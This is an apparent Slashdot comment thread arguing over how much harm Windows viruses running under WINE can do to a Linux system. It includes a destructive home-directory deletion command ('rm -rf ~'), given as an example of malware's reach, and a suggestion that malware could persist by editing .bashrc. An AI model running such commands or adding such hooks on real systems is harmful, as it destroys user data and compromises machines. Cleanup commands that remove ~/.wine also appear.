What can a Windows-targeted virus in WINE do to a Linux system, other than hang around looking impotent? Most of the target DLLs and other windows hidey-holes don't exist in WINE. Even if it finds a place to lurk, it's unlikely that it could hit the Linux system files or boot loader, or perform keylogging outside WINE or snoop on private files. A very crude "wipe drive C:" type virus might molest your WINE environment (your data files are elsewhere, of course), but that's about all. Even if the virus were specifically tailored for WINE on Linux, a successful attack would rely on user stupidity even more blatant than Windows viruses must depend on.

TFA even commented on how easy it is to dispose of the malware, even after spending some effort helping it to limp onto your system.

Re:Windows virus needs help to limp onto WINE

[GravityStar]

It might give virus developers ideas of creating neat, cool multiplatform mutating viruses.

Re:Windows virus needs help to limp onto WINE

[Bert64]

The beauty of wine, is that you can configure multiple wine instances which are segregated from each other, so a virus infecting one won't affect another... Also, since wine is a userland program which is only invoked at the user's request, any malware shouldn't be able to make itself load at boot.

Incidentally, small desktop marketshare is not the only reason, windows has traditionally been more susceptible to viruses due to various design decisions which don't apply to linux, various factors like hiding of file extensions, users being admin by default, files being executable purely based on their filename (linux users have to chmod something first), and the basic fact that windows has its origins in a single user gui addon for dos which had no concept of security whatsoever (yes i know nt does, but they grafted the old 9x interface and apis on top, which fundamentally weakened the security model inherent in nt).

Re:Windows virus needs help to limp onto WINE

[Korin43]

His command is actually even more complicated than it needs to be (deleting wine and reinstalling it). rm -rf ~/.wine && wine will delete the wine folder and rebuild it without the added pointlessness of reinstalling the binaries.

Re:Windows virus needs help to limp onto WINE

[aldld]

Are there any multiplatform viruses that exist yet?

Re:Windows virus needs help to limp onto WINE

[buchner.johannes]

Deleting everything in Z: (user home directory) would be bad enough in my books. Also, sockets are free to use, so it could infect other hosts.

Re:Windows virus needs help to limp onto WINE

[iwein]

http://www.articlesandsuch.com/articles/Stupidity%20Is%20a%20Virus.htm

Re:Windows virus needs help to limp onto WINE

[reub2000]

First off, the black list used by firefox is a feature of firefox, not linux. There is no such proction in Konqueror. Furthermore, browsers can be set to associate EXEs with wine, and a few distro make this the default behavior. And winecfg contains a function to map a users home directory to a drive letter with a single click, putting all of a users data in the hands of a virus running under wine.

Re:Windows virus needs help to limp onto WINE

[BikeHelmet]

or perform keylogging outside WINE or snoop on private files.

The beauty of infecting Microsoft Office is, a user with MS Office probably uses MS Office for everything.

Re:Windows virus needs help to limp onto WINE

[fluffy99]

First off, the black list used by firefox is a feature of firefox, not linux. There is no such proction in Konqueror. Furthermore, browsers can be set to associate EXEs with wine, and a few distro make this the default behavior. And winecfg contains a function to map a users home directory to a drive letter with a single click, putting all of a users data in the hands of a virus running under wine.

Which could certainly be a method of escaping Wine into Linux. All it needs to do it add some creative scripting to bashrc and tcsh.rc, right?

Re:Windows virus needs help to limp onto WINE

[Bacon+Bits]

It can do a lot more than affect the C: drive. It can affect the Z: drive. C: is mounted to ~/.wine/drive_c, but Z: is mounted to /. That is, system root. And I believe it has the same permissions that your user account has.

And lest ye believe that Linux's permissions will prevent damage to your system, think about what permissions needed to run 'rm -rf ~'. Programs are replaceable, data is not.

Re:Windows virus needs help to limp onto WINE

[KDR_11k]

What about forwarding spam mail?

Re:Windows virus needs help to limp onto WINE

[hairyfeet]

You want to know why Linux don't get viruses? You don't get the "Velma" users, that's why. I have a customer we have nicknamed the "walking disaster area" because she will click on ANYTHING that pretends to be a screensaver or comes from one of her friends email addresses, I don't care if the antivirus tries to throw itself between her and the .exe. Just as I had a customer that you could send him ANYTHING with the word 'lesbian" in it, and he would do what? yep, he would run it. .Exe, .VBS, you name it, all it had to do was have lesbian somewhere in the title.

So don't worry, you Linux guys get the "Velma" users I'm quite sure your good friends in Nigeria, the RBN, and China will be cooking up "happy_screensaver.sh" and "hot_lesbians_vid.sh" and the clueless will happily run it and spread bugs like the clap. Trust me, as a PC repair guy for more years than I care to count a good 999/1000 Windows bugs can be traced back to PEBKAC.

Re:Windows virus needs help to limp onto WINE

[BrokenHalo]

The beauty of wine, is that you can configure multiple wine instances which are segregated from each other

At the risk of sounding a bit flamebaity, it could be argued that the beauty of Wine is that it is vulnerable enough to attacks to wipe out your Wine profiles. Nothing of value will be lost, and it will free up a bit of space to put to more worthwhile use.

I've tinkered with Wine since about 1997, and the frustration involved in getting anything to actually work properly has never been justified by results. Linux, although far from perfect, has been mature enough for the desktop for years, while every time I use Windows I find myself grinding my teeth.

Re:Windows virus needs help to limp onto WINE

[commodore64_love]

Velma? The cute girl from Scooby Doo?

Wine
Wine
Wine
Wine

Wine
Wine
Wine
Wine

Glorious wine!

Re:Windows virus needs help to limp onto WINE

[ComputerDruid]

You could simply unmount Z and H with no Ill affects as long as you don't need to access files outside of the C drive. No more problem.

Re:Windows virus needs help to limp onto WINE

[AliasMarlowe]

I've tinkered with Wine since about 1997, and the frustration involved in getting anything to actually work properly has never been justified by results.

My experience with WINE has been similar, until recently. We bought a couple of Wacom graphics tablets for home, and they work very nicely with Ubuntu. Just for fun, I tried to install the painting program that was bundled with them - Art Rage. It installed perfectly, and runs perfectly under WINE, after installing gdiplus http://appdb.winehq.org/objectManager.php?sClass=application&iId=1901. Art Rage is actually a nice program, which attempts to emulate the behavior of real paints, brushes, spatulas, etc. (its features can't be replicated in Photoshop or GIMP).

Linux, although far from perfect, has been mature enough for the desktop for years, while every time I use Windows I find myself grinding my teeth.

We've been Linux-only at home for about 4 years, so I usually only grind my teeth at work. The company is overly dependent on Microsoft stuff, the quirky as well as the worthy.

Re:Windows virus needs help to limp onto WINE

[Fred_A]

Are there any multiplatform viruses that exist yet?

Somewhat, I think there are a few malicious scripts for OOo which *should* by their nature be multi-platform if they're properly written. After that it mostly depends on what they try to achieve. I don't think they are very frequent in the wild.

Re:Windows virus needs help to limp onto WINE

[hairyfeet]

You know, that is why I always had to scratch my head at the "year of the Linux desktop" guys. I mean, lets think about it: To be a year of the Linux desktop, you would have had to push Linux over the edge into TRUE mainstream appeal. That means NO CLI, or folks willing to read the instructions or learn...well pretty much anything. The real "clicky clicky" will have to decide your OS is nice to use.

Do you know what comes with THAT crowd? Believe me, as somebody who has worked the PC repair biz, to steal an old joke I can tell you stories that would turn you white! This is the same crowd that will give their CC numbers to Nigerian princes, buy herbal Viagra, click on any damned thing that has the words porn or free in the label, etc. In short even your most brain dead script kiddie would have NO problem writing Linux viruses for these brain trusts as they will happily ignore every warning and give their password without a second thought.

I truly believe one of the MAIN reasons why Linux isn't being targeted for attack like Windows and lately Macs is the perception that the Linux users actually have a brain, and isn't gonna blindly click on everything you show them. But you truly have a "year of the Linux desktop" and first will come the script kiddies, which is bad enough, but then the big boys, those nasty pro coders in places like Russia and China will see that the script kiddies are having some successes, and then all hell will break loose as they decide to start adding their own nasty Linux code to those websites they use to spread malware to Windows boxes now.

So be happy you are a small niche with an aura of geeky smarts, Linux guys. Get down on your knees and thank Linus and RMS for that every day of the week. Because as someone who has to deal with these brain trusts every. damned. day. trust me, you so do NOT want the "average Windows user"!!!

Re:Windows virus needs help to limp onto WINE

[reub2000]

I guess. I just don't see virus writers trying to take advantage of wine. Wine installations represents a subset of an already small slice of pie.

Re:Windows virus needs help to limp onto WINE

[Bacon+Bits]

That's not the default configuration, though. Assuming the default is a pretty safe assumption.

Re:Windows virus needs help to limp onto WINE

[ComputerDruid]

I'd also assume the default configuration isn't downloading and running exe's that are obviously malware either, but I guess defaults are an important thing to consider when considering security for the masses.

Re:Windows virus needs help to limp onto WINE

[skiman1979]

Sure, but since we Linux users don't normally run as root, that happy_screensaver.sh will be met with various 'access denied' errors. The script will have to include various privilege elevation exploits in it to affect the system.

Then again, the data that most users care about is their own data, their pictures, videos, documents, not_pr0n folder, things like that. Malware on any system won't have to do anything 'special' to get to that data. So of course we just have to resort to telling users 'don't be stupid' so they don't lose their data.

At least the OS would be relatively safe.

Re:Windows virus needs help to limp onto WINE

[DaVince21]

What can a Windows-targeted virus in WINE do to a Linux system, other than hang around looking impotent?

It could trash your home directory, if it somehow manages to find it. But that's about it, unless you run Wine as root, which you're not supposed to do.

Re:Windows virus needs help to limp onto WINE

[DaVince21]

Cool? Neat? We're still talking about viruses, right?

Re:Windows virus needs help to limp onto WINE

[hairyfeet]

What good is having the "OS safe" if the user is totally pwned? And don't forget these people have NO problem with inputting their password, be it their personal one or root. With social engineering it all comes down to Dancing Bunnies Problem and as someone who has been working PC repair since the days of Win3.x i can tell you that all it takes is the right carrot and they WILL jump through hoops to run it. And the malware writer doesn't care about root as long as he can spew spam on the network you know.

So again this is why the "year of the Linux desktop" is a truly bad idea. I have to deal with "average Windows users" all damned day long and believe me, it really don't take much with those folks to totally pwn a system. Limewire with Lesbian_avi.exe, screensavers from their 'good friends", hell the Velma that I based the "Velma Problem" on is a perfect example. Read this and tell me again how Linux security would help with THAT level of dumbass?

Re:Windows virus needs help to limp onto WINE

[skiman1979]

There will always be stupid users. There isn't really much we can do to stop stupid people from jumping through hoops to click on the dancing bunnies app, posting their IP address and root password on Facebook so their "computer friend" can help them with their problem, etc.

The best we can do is design the system to be "OS safe" and hope the user is at least smart enough to back up their data. If not, it's the user's fault. We can at least design the OS to make backups easy, hold the user's hand through the process. In the end, the user has to decide for himself to actually do that backup.

You can design a car to be as safe as possible, but there's still not much you can do to stop a stupid user from slamming that car into a tree if the user is hellbent on knocking the dancing bunny out of the tree with it.

Re:Windows virus needs help to limp onto WINE

[hairyfeet]

Well I would argue that Vista, Win7, and to a lesser extent XP in limited user mode, is "OS safe' but the second you let the seething wall of dumbass loose upon them all the security in the world wouldn't help. Think of it this way- What makes Linux a 'safer OS'? Does it have safer default security? No argument there, but i would argue what truly makes Linux a more secure Environment is that the legions of blackhats out there know that Linux users are generally more IT savvy, more capable of working through even complex IT problems, and are FAR more security wise.

Now picture the "march of the morons" you would get if there TRULY were a "year of the Linux desktop". Suddenly Linux developers are hit by a 50 foot tidal wave of stupid, as things that NEVER should have been a security issue, as "what moron would just jump through hoops and hand out data like that?" become an every single day occurrence. Morons running as root, or handing out their root password to pretty much ANY app for ANY reason, as you said posting their IP address to Facebook, just a total natural disaster of dumbass.

I would argue because the Linux developers haven't ever had to deal with the truly mind numbing level of stupid that quite a few of my Windows customers can come up with (I needed to move the machine and just yanked and now there are wires hanging out and junk. Is that bad?) and would quickly be abandoning Linux for BSD or Plan 9 or pretty much ANY OS that the morons didn't like, and the few developers that were left would have this face permanently etched, along with ulcers the size of Texas.

Be smart Linux guys, and let MSFT keep the great unwashed masses of stupid. Trust me, after working with them for nearly 15 years you do NOT WANT them on your OS.

Mac Office was a bigger headache for me

[Savior_on_a_Stick]

Users with Office installed seem to end up documents infected with a macro virus.

While the Macs are themselves unaffected, they pass along the infection to windows boxes.

That's usually the point where they are found and removed, but the general lack of av for Mac (few choices and most lack functionality/accuracy) along with the perception of macs as immune means that av is rarely installed on macs.

When it is, AV_App_X doesn't detect the malware, whereas AV_App_Y detects, but can't clean, and AV_App_Z has no realtime scanning.

Re:Mac Office was a bigger headache for me

[Totenglocke]

While the Macs are themselves unaffected, they pass along the infection to windows boxes. That's usually the point where they are found and removed, but the general lack of av for Mac (few choices and most lack functionality/accuracy) along with the perception of macs as immune means that av is rarely installed on macs.

Quite true. However, Symantic Endpoint Protection now supports OS X as well, so there's at least a decent (for business use, I'd never touch Symantec for personal use) AV program for Mac now. The hard part will be explaining to people why they need it.

I had a user the other day when I went to work on his machine who had removed AV - I mentioned the lack of AV and he goes "Well it's just on a separate workgroup, it's not on the domain". Well that separate workgroup still had internet access (even though technically it wasn't supposed to), which he knew quite well from all the im clients and browsing he'd done on that machine. After I installed AV on it I ran a scan and, surprise!, it had a dozen viruses. I'm actually surprised it wasn't more than that.... But yes, some people just aren't smart enough to realize that you need AV protection.

Re:Mac Office was a bigger headache for me

[mevets]

The analogy between computer virus and human virus breaks down at responsibility. MS software is incredibly susceptible to viruses (viri?) because of clear business decisions they made. Market domination is a secondary effect; opportunity plays a huge role in this.

annecodote: after a friends car was stolen with his keys, he asked the police officer if he should change the locks on his house. The officer replied "Not to worry, if they were that ambitious, they would have a job"

They must have known what they unleashed, to be generous, 12 years ago. They chose to do it anyways, probably using the Ford Pinto (4 wheel toaster) business model.

If MS wants the few of us who doesn't use their software to insulate their systems, they should at least bribe us. $50/year and an open source virus scanner would be fine. I shouldn't have to join the norton/symantec/... protection racket simply because I might forward a "funny video" to some poor shmuck who has to use Windows.

Re:Mac Office was a bigger headache for me

[ajlisows]

Macro virus? Really? I'm just curious, how long ago was that? I don't think I've seen a Macro Virus in a decade or so. Not doubting your statement, I'm just curious.

Just get hacked, it is easier anyway

In 1996, my Linux box was hacked in under 20 minutes of being online. The root account password was changed and my account was deleted (along with all my files). I reinstalled and learned about securing unix.

In 1998 my Linux box was hacked due to a 3 month behind-patch version of bind. They dropped a perl script into /tmp and tried to gain root with a perl timing-to-root bug, which had already been patched on my system. A disconnected backup was used to validate all the files on the system and proved that only the named userid and /tmp/.sdfsdfs directory had been touched.

I don't run bind on an internet accessible machine anymore.

I haven't been hacked since, but I'm not so ignorant to believe that I can't be hacked. My plans for when I'm hacked revolve around discovering the cause and restoring from a complete system backup, then removing the vulnerability. I expect to be hacked, period. "I" is really "we" since I run servers for my company and for other companies.

Neither hacks were viruses, but they were just as bad and could have been much worse.

Linux isn't THAT more secure, it is just less targeted since Windows is 90%+ of the computers. Stop being so smug folks.

I think Apple is about to learn a real lesson with the iPhone being hacked constantly. Then Linux will be targeted.

Re:Just get hacked, it is easier anyway

[argent]

Linux isn't THAT more secure, it is just less targeted since Windows is 90%+ of the computers.

A properly configured UNIX client system is significantly more secure than any comparable Windows system, even if you don't run a firewall. There are two significant differences: Internet Explorer, and Services.

The security model of IE is inherently flawed and can not be fixed without breaking existing applications. Microsoft is unwilling to take that step.

Windows services are neither run from a superserver nor in virtually all cases do they allow binding to specific ports, and Windows networking (LAN Manager) requires having services with open ports.

These are fairly significant problems that can not be addressed without changes to Windows APIs that are unlikely to happen.

I think Apple is about to learn a real lesson with the iPhone being hacked constantly.

If someone has physical access to the system, all the software security in the world is useless. The iPhone is being attacked by the device's *owners*. These are *local exploits*, much more common and of much less concern than remote ones.

Re:Just get hacked, it is easier anyway

[jedidiah]

> Linux isn't THAT more secure, it is just less targeted since Windows is 90%+ of the computers. Stop being so smug folks.

You're on f*cking crack. You're talking about BIND of all things. What does a normal user need with BIND?

Of course BIND is one of the most notorious Unix services out there. It and sendmail have a long history of problems.

Even in 1998, it was known as a STUPID thing to do.

The thing with Unix (and MacOS) is that once a stupid thing is exposed, companies,
distributors and end users tend to stop doing it. It doesn't fester like a boil
until it turns into some sort of life threatening infection.

Also, the problems with BIND or sendmail or even PHP are application problems that
can impact any Unix or any other OS that runs those applications. Since none of them
are subject to any sort of "monopoly coercsion" it's rather trivial to get rid of them
and possibly run an alternative if need be.

What do you run if msoffice is a wormfest?

It's 2009 and Windows users are still being infested with IE malware. Just avoiding
IE by itself can go very long way in helping n00bs keep their Windows boxes intact.

The smugness is entirely warranted.

When running Windows, it has always been best to minimize your use of Windows products.
This was true with Windows 3.1 and it's still true today. Microsoft remains worse than
anyone else in the industry (including Apple).

Re:Just get hacked, it is easier anyway

[argent]

One patched exploit is not "being hacked constantly".

The only place the iPhone is "being hacked constantly" is jailbreaking.

Re:Just get hacked, it is easier anyway

[argent]

I've configured Windows so that it's about as secure as it can get, and to actually use many of the important capabilities of the OS you HAVE to run a firewall.

To properly configure Windows so it can't potentially be exploited through these kind of holes without a firewall you have to turn off Windows Networking. You can't be a member of a domain. You can't access CIFS shares. You can't authenticate to services that use CIFS authentication like Exchange and Sharepoint.

In addition, you can't use Internet Explorer safely. Nor any of the applications that include shells around the Microsoft HTML control like Windows Media Player or even third party products like Realplayer.

Back in the early '90s when most UNIX systems came with telnetd and rsh and so on enabled by default you might have had an argument, but even the cruftiest traditional UNIX systems still on the market turn that stuff off or even leave it out.

Parallels Virtual Machine

[reporter]

The issue of viruses infecting Linux from a Windows program running via Wine is really a non-issue. Nowadays, you can spend a small amount of money and buy a Parallels application that emulates a real Windows machine. This virtual machine is fully isolated from the rest of the Linux system.

I use Parallels Desktop 4.0. It works great on my MacBook Pro. I can run almost any Windows program. The downside is that, of course, the Windows virtual machine is slower than a real Windows box. However, what is important to me is that Windows viruses are trapped inside the virtual machine.

I like to say, "The Power of Mac. The Utility of Windows. Thanks to Parallels." No. I don't work for Parallels, but I love this product.

Re:Parallels Virtual Machine

[cheftw]

You presume that it is impossible to break out of a virtualised environment.

A quick google will turn up papers which may diminish your naivety.

Also IMHO the way to go is VirtualBox (FOSS and made by Soracle).

Re:Parallels Virtual Machine

[master5o1]

-1 Advertisement.

Re:Parallels Virtual Machine

[EllisDees]

>Also IMHO the way to go is VirtualBox (FOSS and made by Soracle).

Agree 100%. I'm watching Netflix on my linux media box right now using XP in Virtualbox. Works like a charm.

Re:Parallels Virtual Machine

[molnarcs]

You presume that it is impossible to break out of a virtualised environment.

A quick google will turn up papers which may diminish your naivety.

Also IMHO the way to go is VirtualBox (FOSS and made by Soracle).

Small correction - VirtualBox, made by Innotek bought by Sun bought by Oracle.

Re:Parallels Virtual Machine

[cheftw]

I knew, but felt it would complicate things. It's all about the sell.
You know those Parallels users (actually Parallels isn't awful, it's just non-free).

To be pedantic ..

[NoYob]

Linux doesn't have malware...

Yes it does: it's just very very rare.

A friend of mine bought a domain and within hours of getting it and starting it, someone put a rootkit on that damn thing before he could lock it down - yes, it was a Linux server hosting his domain. Yes, it's not malware per se as you would from surfing the web, but we shouldn't get complacent about Linux' absence of threats.

Re:To be pedantic ..

[Jesus_666]

The GP's friend probably rented a root server - those come preconfigured, although you can do with them what you want. If the hoster's default configuration has an unpatched security flaw (for example because they didn't bother to update the image regularly) you could easily end up with a server that's vulnerable out of the box.

not just marketshare

[RiotingPacifist]

Ubuntu 9.10 will start sandboxing desktop programs (starts with xpdf i think), other distros do already/will follow. I think that sandboxing can (and if required will) criple malwares abilities (e.g can't listen on network ports, can't insert itself to bootsequence, can't touch chrome tabs that are connected to https sites) leaving them unable to do most malwarey things without permission and can work like an AV that is designed right (e.g warn users that they are about to do something very stupid, only when they are not everytime they run a 3rd party app/widget, without having to scan binaries)

Re:not just marketshare

[lukas84]

You mean just like Internet Explorer has been doing since the End of 2006?

Re:not just marketshare

[CarpetShark]

You mean just like Internet Explorer has been doing since the End of 2006?

Hahhah, no, certainly not like Internet Explorer has been doing.

Re:not just marketshare

[RiotingPacifist]

To an extent yes, (seriously mods, moding funny because you disagree?), however AFAIK IEs implementation is in IE not at system level, so it cannot be applied to anything but IE & plugins. OFC this isn't to say that it can't rigorous sandboxing can't be implemented in windows, just that the tech is already in Linux, it just needs the configuration and UI to move it to the dekstop, IMO this would come if there was demand.

Re:not just marketshare

[coryking]

however AFAIK IEs implementation is in IE not at system level

You would be incorrect. IE uses an OS level service known as Windows Integrity Mechanism. Same mechanism used by UAC or Silverlight.

IT's a trap

[RiotingPacifist]

The site is already running evil code on my computer against my permission!

(before down-voting look at the top of TFA)

feeding the dead tigers back to other tigers

[snikulin]

Felinae spongiform encephalopathy!

Great...

[ctrl-alt-canc]

Now they can claim a 100% emulation of Windows.

Re:Great...

[1s44c]

Now they can claim a 100% emulation of Windows.

No. They still need to add the random blue-screen feature.

Malware rise

[gmuslera]

Thousands of Linux systems now are running windows virus. That new improvement in Wine made a lot of Linux users to intentionally install the last wine version and browse dangerous places using IE6 under it to see if they get lucky and get some virus. "I'm excited", said one linux user, "i managed to get 3 different virus, a worm, and you wont believe, my machine is now part of a botnet! Woohoo!".

Strongly misleading headline!

[Hurricane78]

Yeah, it can run viruses, but "not all features may work -- in this case, the crippling of the system, immunity to the task manager, identity theft, etc.".

So in fact, it's not a virus anymore. It's just another program. The very point of being a virus is gone. Because the security settings still hold. (Unless you are retarded enough to run a Wine program as root. But in that case you're just asking for it anyway. ^^)

Re:Strongly misleading headline!

[erebadan]

Technically speaking a virus is a small piece of code that can replicate and spread itself. Whatever it does (or not) to your system doesn't matter much. Once your machine is infected, you become a threat to others.

Re:Strongly misleading headline!

[bendodge]

Actually, Wine refuses to run under sudo. I know this because I used to use Windows data recovery programs (that naturally needed root) in Wine on NTFS drives. It used to work surprisingly well.

Stop whining.

[itsybitsy]

Don't want a virus, it's simple, stop whining.

This is not news

[93+Escort+Wagon]

We've seen "viruses running under Wine" stories on Slashdot before. Years before, as a matter of fact.

BTW I love the really pathetic spin in the submission - "things don't work correctly, and that's a plus!"

What will they name it

[syntap]

The Linux virus via WINE, or S-WINE bug.

Just goes to show you

[illumastorm]

This just goes to shows you how good Windows emulation on Linux is.

Re:Just goes to show you

[jedidiah]

Yup. An emulated copy of Windows is still a copy of Windows.

You need to treat it like Typhoid Mary and keep it away from things it can infect or get infected by.

Fear the WINE Flu !!!

[Jackie_Chan_Fan]

Obama has just declared the WINE Flu a boring and uninteresting, non mainstream worthless distraction from the launch of Windows 7. It runs viruses natively folks!

Actually Windows 7 is quite good.

Good luck Bro. -Opie

Wrong

[pablomme]

From TFA:

If it managed to infect the Wine registry well enough that it's run automatically, I will have to go into the Wine registry to remove it manually. Or I could run a couple of simple commands:
sudo aptitude purge wine;
sudo aptitude install wine;

Wrong. Wine installs stuff in ~/.wine. The above commands don't touch user directories, so he would end up with a fresh system-wide wine installation but the same malware-ridden user config.

Re:Wrong

[Hatta]

Yeah, it doesn't seem that this guy has used Wine all that much. Instead of grepping ps and killing the PIDs, he could have just used 'wineserver -k'. To remove the virus, just delete ~/.wine, Wine will even replace it automatically next time you run it.

Re:Wrong

[pablomme]

Yup.

ha, Linux wins yet again!

[Tumbleweed]

See, Linux _can_ do everything Windows can do! A better Windows than Windows...where have I heard that before?

Hmm

[Krneki]

I hope it won't get the new sWine virus.

Wine improving by feeding on Windows Viruses

[Zombie+Ryushu]

Is it possible that Wine could grow more powerful by running viruses on it, learning about how the virus interacts with Windows, and then figuring something "undocumented" about Windows from the virus? I could see Wine gaining alot of new and better functionality by learning from Windows Viruses that malware writers write. Turning every malware writer an unwitting Wine contributor.

its been known for a long time

[luther349]

wine has been able to run a vires payload for a wile now. it doesent effect the system any. linux can spred a windows vires to a windows system but not get infected itsself. this is why linux antivires softwhere is out not to relly protect the linux system but to prevent accidentally sending a infected file to windows.

Well.

[UbuntuniX]

Who could have possibly seen this coming?

Re:ReactOS

[CarpetShark]

ReactOS is still around, and progressing well enough. It's based on NT though, not 95, or at least, it is now.

Re:Its going to be Mono!

[petrus4]

He says that it is all about money, no evil conspiracy. But he does say they (MS/Canonical/Red Hat) have made an agreement to push forwat Mono as THE platform, and that they really don't openly share this Grand Plan with their developers. They just slowly are moving their developers in the direction of Mono, fearing that if they push too fast there might be some silly revolt.

I suspected as much. I think a number of us have had a feeling for a while now, that Mono = Embrace and extend for Linux, essentially.

People will eventually come to realise that the so called, "purist," perspective in this case was prescient. It's just a shame that it's still probably going to destroy Linux in the process.

I just hope Microsoft are willing to allow us to keep the BSDs, at least.

Re:Precautions I take

[master5o1]

Call it the-bell. Then you can have "last saved by the-bell."

Not really news

[Erikderzweite]

It has been known for some time that viruses might run on wine. Threr is an urban legend about some Linux user who has tried to launch some malware in wine just to see if it's gonna work.
It worked. Indeed it worked so well, that the malware has managed to steal his ICQ password from QIP (which was running in wine too).

I wrote about this and it was on Slashdot 7 yr ago

[cybereal]

Hi, I wrote an article about my observations of klez infecting a computer that was both a friend's desktop machine and a small vhost business. It was on slashdot SEVEN YEARS AGO. So this is anything but news. http://tech.slashdot.org/article.pl?sid=02/10/23/1853219

Why modded funny

[Britz]

Well, many malware apps still spread simply because users will click on anything and also try to click away checkboxes as fast as possible.

The problem is the user, not the os. It doesn't matter how secure your system is.

So this comment is actually very insightful. Replace "malware" with any app that the certain user REALLY wants to have (like Facebook-Hack-And-See-Pictures-Marked-Private-In-Profiles-Application) and they WILL install it. Even if the procedure is complicated.

Anonymous Coward

Simple.

1. Use a real distribution and read fucking books
2. Only use ssh (It can do everything) and lock it down
3. iptables takes care of the rest
4. You don't need Wine (Who needs MS software anyway?)

This has been posted because the Washington Post declared that Linux is the safest way to go for online banking. Action - Reaction. The oldest trick in the books.
Unix IS proven technology. Microsoft is just soft.

Just don't run WINE as Root

[Orion+Blastar]

or administrator, then the viruses won't be able to install.

ReactOS is also based on WINE code, but it has a different security model than Windows XP/2003 has in that it is more like Linux in that normal user accounts cannot install anything or modify system files, you have to run as Administrator/Root for that. The same thing with WINE.

Just like you wouldn't surf the Internet as root, you don't want to run WINE as root either. In that way WINE is superior to Windows XP/2003 as it uses Linux security.

Actually I switched from WINE to VirtualBox from Sun to run Windows XP Pro in a virtual machine to get more XP compatibility. But it doesn't do 3D Video and DirectX 3D support very well, but that part is still being developed. It is the only way I can get Visual BASIC 2008 to run under Linux, WINE won't run it.

Difference between "purge" and "remove"...

[yet-another-lobbyist]

Isn't the difference between "purge" and "remove" that "purge" also removes the user settings (in this case ~/.wine)?

Re:Difference between "purge" and "remove"...

[pablomme]

System settings, never user settings. I.e., stuff in /etc et al, but not in ~user/.program.

The reason for this is very simple. What should happen if the system administrator decides to remove a program (purge or not) and the user happens to store documents in its configuration directory (this could potentially be wine)? Should ~user/.program be removed? Should ~user be touched at all by any maintenance action performed by root? Clearly not.

Re:Difference between "purge" and "remove"...

[yet-another-lobbyist]

That makes a lot of sense. Thanks.
So one would really HAVE to delete ~/.wine manually in order to recover.

I thought it was pathetic spin too.

[Valdrax]

BTW I love the really pathetic spin in the submission - "things don't work correctly, and that's a plus!"

Yeah, that got me too. Have you ever had the "fun" of trying to get an app working on Wine that their website claims works just perfectly with it? I've had only a 30% success rate at getting games to run under Wine, and I'm not really surprised to see some Wine user with Stockholm syndrome deeply impressed by just how far a virus could stubble, stutter, and limp its way through Wine.

Wine still sucks as far as I'm concerned.

What about the time while it is running?

[Ilgaz]

If you are infected while VM is on, there is nothing stopping your virtual machine send spams, distribute viruses and doing even worse things. I have seen how fast and easy a good written worm infects system without any sign.

There are also mad things happening like Delphi based virus infecting million downloaded utility developer machine without getting noticed and being distributed. Take Windows security very serious and of course, I don't say you should run some state of art security suite. A basic and good written AV like Avast can even run fine under emulated x86 (VPC 7).

Re:I like Linux but...

[gujo-odori]

I beg your pardon?

It's hard to get effective third-party software because of some vague thing about Linux kernel versions?

You'll excuse me for pointing out inconvenient truths, but _all_ Linux software other than the kernel itself is third-party. Linux is, after all, just a kernel. The rest of what makes up a Linux-based operating system is written by third parties, starting with GCC and the rest of the GNU tools. Some of it is even proprietary.

Lest you try and backtrack and say you were only talking about AV software, there is lots of AV decent software available for Linux, and guess what? It's all written by third parties, too.

The distributors themselves are third parties, except to the extent that they have kernel developers on their staffs.

You may have also failed to notice that there is excellent support available for Linux from a variety of sources, including paid support with SLAs, for those who want or need it.

If you're going to troll, you should at least be good at it.

A /. "Virus on Linux via WINE" story from 2001

[DenialS]

So, your story was only one year after the earliest story of this type that I could find on Slashdot:

http://tech.slashdot.org/story/01/09/23/1614214/SirCam-on-Linux-via-WINE

2001... wow.

sWine Flue

[jdc18]

lets call it swine flue. Oh wait the name is taken

Not sandboxed, and it can autostart

[phorm]

Not entirely true. Most wine installs have access to either your homedir or the root directory as various drive letters (mind you only as the user it runs as).

So technically if it was a runs-in-wine-but-targets-'nix type of virus, it could find your .bashrc or whatever, and edit it to launch on login.

Crufty hacks

[phorm]

It's actually funny. A lot of things in windows are various hacks to improve security. For example, disabling access to the "Internet Properties" control panel from IE. At least on XP, that policy doesn't work because it is still accessible from elsewhere such as the privacy/cookies section in media player. The lack of an underlying security method makes some things very difficult or well near impossible to secure.

For Linux, the problem is the opposite. You're working against certain levels of security to improve accessibility. For example, when accessing thumb drives or scanners, you may need to work with udev to ensure than the /dev/x entries are read+writable by a particular group (floppy, disk, cdrom, plugdev, whatever) that your normal users would belong to. You don't want all the dev block entries to be thus because then the user could have direct access to your system disks.

Gee, maybe we should bake a cake or something

[bratwiz]

Gee, what an illustrious milestone. A red-letter day for Linux. Woo-hoo... whoop it up boys and girls! A system so desperate for exploits that we'll EMULATE a whole 'nuther system just to get them!

Comment removed

[account_deleted]

Comment removed based on user account deletion

Re: Dancing Bunnies

[E33K+TH3+B34R]

LMAO . . . . Agree Totaly : D

Blaster didn't care about what you do

[Ilgaz]

A serious zero day threat, such as Blaster doesn't need any kind of user intervention, nothing open, no configuration faults. It just works. It is not like they will browse with IE and let me tell one reason why most installs a VM, to actually BROWSE with IE under Windows. Web designers, people who does business with companies infested with MS and even some Intranet users.

Also when I talk about OS X users, I talk about the general community. You know, same guys double click DMG files and happily give their passwords to have some "codec" installed (trojan).

Re:Blaster didn't care about what you do

[Valdrax]

A serious zero day threat, such as Blaster doesn't need any kind of user intervention, nothing open, no configuration faults. It just works.

And then what harm does it do to your own system if the VM is sandboxed?

It is not like they will browse with IE and let me tell one reason why most installs a VM, to actually BROWSE with IE under Windows. Web designers, people who does business with companies infested with MS and even some Intranet users.

Ah, well that is a good, valid use of a VM to use the internet, but I doubt that it's "most installs." In that use case, there's no need to allow the VM to write any changes to its state to disk when you're done. If it gets a virus, who cares?

Also when I talk about OS X users, I talk about the general community. You know, same guys double click DMG files and happily give their passwords to have some "codec" installed (trojan).

And while that is a problem -- a totally separate problem -- what does that have to do with using a VM? I doubt very seriously that most Mac OS X users use VMs to go online. Few of us are big enough IE lovers go through that kind of hassle and expense when you could just use native Safari or Firefox. Web developers are not representative of the community.

Luckily, I have a solution

[BhaKi]

rm -rf ~/.wine; winecfg

This has been ongoing for years

[apexwm]

